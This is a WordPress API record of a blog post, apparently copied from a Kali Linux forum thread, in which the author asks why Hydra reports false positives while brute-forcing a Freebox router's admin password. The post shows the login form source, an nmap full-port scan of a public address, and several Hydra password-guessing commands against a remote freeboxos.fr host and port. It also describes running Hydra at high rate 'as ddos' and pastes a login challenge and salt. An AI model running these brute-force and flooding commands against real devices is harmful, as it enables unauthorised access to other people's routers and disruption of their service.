{"id":1067,"date":"2021-04-27T08:46:20","date_gmt":"2021-04-27T00:46:20","guid":{"rendered":"https:\/\/byy3.com\/?p=1067"},"modified":"2021-04-27T09:20:26","modified_gmt":"2021-04-27T01:20:26","slug":"hydra-routeur-attack-freebox-kali-linux-fr","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=1067","title":{"rendered":"Hydra routeur attack &#8221; freebox &#8221; &#8211; Kali-linux.fr"},"content":{"rendered":"<p>Hi everyone!\u00a0 Yes, it's me, after a long absence from the Linux platforms\u00a0\u00a0<img decoding=\"async\" class=\"smiley\" data-original=\"http:\/\/www.kali-linux.fr\/forum\/Smileys\/default\/tongue.gif\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Hydra routeur attack &#8221; freebox &#8221; &#8211; Kali-linux.fr\u63d2\u56fe\" alt=\"Hydra routeur attack &#8221; freebox &#8221; &#8211; Kali-linux.fr\u63d2\u56fe\" \/>\u00a0I'm back ^^<\/p>\n<p>At the moment I have turned to hydra to try to find the router's access password (not the network's, I'm already on it)<br \/>\nFirst of all, there is the router's address on the network: 192.168.1.254<\/p>\n<p>The source code of the login page that we are interested in is:<\/p>\n<p>&lt;form id=\"login-form\" method=\"POST\" action=\"\/\"&gt;<br \/>\n&lt;input type=\"text\" style=\"display: none;\" value=\"freebox\" name=\"login\"&gt;&lt;\/input&gt;<br \/>\n&lt;input id=\"fbx-password\" class=\"password\" type=\"password\" name=\"password\" value=\"\"&gt;&lt;\/input&gt;<br \/>\n&lt;\/div&gt;<br \/>\n&lt;\/form&gt;<\/p>\n<p>Bottom line: we don't need a login, so: -l \"\"<br \/>\nthe method = POST: http_post_form<\/p>\n<p>In the end I have the following code:<br \/>\nhydra -l \"\" -P \/usr\/share\/wordlists\/nmap2.lst -t 1 -f -v -V 192.168.1.254 http-post-form \/:password=^PASS^:index.php<br \/>\n<strong>so\u00a0 \u00a0new version, online and 
correct<\/strong><\/p>\n<p>First you need nmap -p- 91.168.99.0\/32 -Pn<\/p>\n<p><strong>hydra -l \"\" -P \/usr\/share\/wordlists\/nmap.lst -t 12 -v -V xxxx.freeboxos.fr -s 44261 http-post-form \/:password=^PASS^:login.php:\"Identifiants incorrects\"<\/strong><\/p>\n<p><strong>hydra -l \"\" -P \/usr\/share\/wordlists\/nmap.lst -t 12 -v -V xxxx.freeboxos.fr -s 44261 http-post-form \"\/:password=^PASS^:login.php:Identifiants incorrects\"\u00a0 \u00a0 (test good no result)<\/strong><\/p>\n<p><strong>hydra -l \"\" -P \/usr\/share\/wordlists\/nmap.lst -t 12 -v -V xxxx.freeboxos.fr -s 44261 -O http-post-form \"\/:login.php:password=^PASS^:Identifiants incorrects\"\u00a0 \u00a0 \u00a0 (-s indicates the port; -O indicates encryption) --ddos<\/strong><\/p>\n<p>then\u00a0 as ddos <strong>hydra -l \"\" -P \/usr\/share\/wordlists\/nmap.lst -t 12 -v -V xxxx.freeboxos.fr -s 44261 http-post-form \/:password=^PASS^:login.php\u00a0 \u00a0 (5m\/s send to the freebox)<\/strong><\/p>\n<p>The problem is that as soon as I launch hydra, the first password in the password list returns \" 1 of 1 target successfully completed, 1 valid password found \" even though it is not the right one\u00a0\u00a0<img decoding=\"async\" class=\"smiley\" data-original=\"http:\/\/www.kali-linux.fr\/forum\/Smileys\/default\/shocked.gif\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Hydra routeur attack &#8221; freebox &#8221; &#8211; Kali-linux.fr\u63d2\u56fe1\" alt=\"Hydra routeur attack &#8221; freebox &#8221; &#8211; Kali-linux.fr\u63d2\u56fe1\" \/><\/p>\n<p>What do you think? 
I have a hunch that the modem always returns code 200 and not 403 for an error, which makes hydra think it has found the right password.<\/p>\n<p>Thanks.<\/p>\n<p>http:\/\/91.xxx.99.xxx:33839\/api\/v8\/login<\/p>\n<pre>{\"success\":true,\"result\":{\"logged_in\":false,\"challenge\":\"lWuTRdbsj2kmy3d45WAiXYRlWM6tsmIh\",\"password_salt\":\"Gyovy+WiZH3jm7miT\\\/N1tuxoWzKlSTA2\",\"password_set\":true}}<\/pre>\n<p><img decoding=\"async\" data-original=\"https:\/\/www.free.fr\/data\/shared-rs\/freebox-revolution.jpg\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Hydra routeur attack &#8221; freebox &#8221; &#8211; Kali-linux.fr\u63d2\u56fe2\" alt=\"Hydra routeur attack &#8221; freebox &#8221; &#8211; Kali-linux.fr\u63d2\u56fe2\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hi everyone!\u00a0 Yes, it&#8217;s me, after a long a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[626,628,627,247,629],"class_list":["post-1067","post","type-post","status-publish","format-standard","hentry","category-net-security","tag-attack","tag-brute","tag-freebox","tag-hydra","tag-password"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/1067","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1067"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/1067\/revisions"}],"wp:attachment":[{"href":"h
ttps:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1067"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1067"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1067"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}